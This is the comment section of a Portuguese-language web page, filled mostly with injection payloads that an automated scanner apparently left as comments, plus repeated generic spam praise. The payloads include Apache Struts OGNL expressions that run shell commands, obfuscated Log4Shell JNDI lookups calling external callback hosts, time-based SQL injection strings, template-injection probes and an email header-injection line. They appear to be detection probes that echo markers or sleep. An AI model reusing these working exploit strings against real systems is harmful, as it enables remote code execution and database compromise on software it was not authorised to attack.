Respostas de 139

  1. %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  2. ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//e5c6c2cb7cb116382fecfcadc0d13467fd353e87.22083937646011261.3252451661.log4j10.log4j.us3.qualysperiscope.com./QualysWAS}

  3. 1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))

  4. I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.

  5. %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  6. ${jnd${123%ff:-${123%ff:-i:}}ldap://8ba1572e52dafc5bfdcae71b39890384629b162a.22293087646011261.2583431167.log4j07.log4j.us3.qualysperiscope.com./QualysWAS}

  7. 1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys

  8. ${jndi:ldap://0bf4fa81f1049c5205dcd1498317eb614438bcaf.22365441646011261.2834907544.log4j02.log4j.us3.qualysperiscope.com./QualysWAS}

  9. ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//1d60a593eaa917eb1aed907e77afd287c6014292.22365441646011261.1453739823.log4j08.log4j.us3.qualysperiscope.com./QualysWAS}

  10. ${dns:address|91b5676c99513190afdefd396f0a7bcbda4d8ade.22365441646011261.2650942349.oscomm21.oscomm.us3.qualysperiscope.com.}

  11. 1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime

  12. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

  13. ${jnd${123%ff:-${123%ff:-i:}}ldap://9c522f78d49af4b9509c86f93688682c4a8156aa.22446637646011261.291531718.log4j07.log4j.us3.qualysperiscope.com./QualysWAS}

  14. I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.

  15. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  16. ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  17. Joe+
    bcc:was_engine@f4e5b2a8b8ea25f4e661c98692f27c96586378a9.22512849646011261.3104775039.smtphi01.smtp.us3.qualysperiscope.com.

  18. ${jndi:rmi://1400585f981c643221b677777203025f81735387.22512849646011261.1167757971.log4j03.log4j.us3.qualysperiscope.com./QualysWAS}

  19. ${jnd${123%ff:-${123%ff:-i:}}ldap://3ec8cfc1fa0beca22e37c7940cce77443aa795c9.22512849646011261.471173991.log4j07.log4j.us3.qualysperiscope.com./QualysWAS}

  20. ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://5acef6b034df415c3cfbe5d6b9cb6517abee695f.22512849646011261.3950893136.log4j11.log4j.us3.qualysperiscope.com./QualysWAS}

  21. ${dns:address|cabcb1ab65fdc1be0cb33f9a0715d82effd611d4.22512849646011261.2606452797.oscomm04.oscomm.us3.qualysperiscope.com.}

  22. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

  23. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *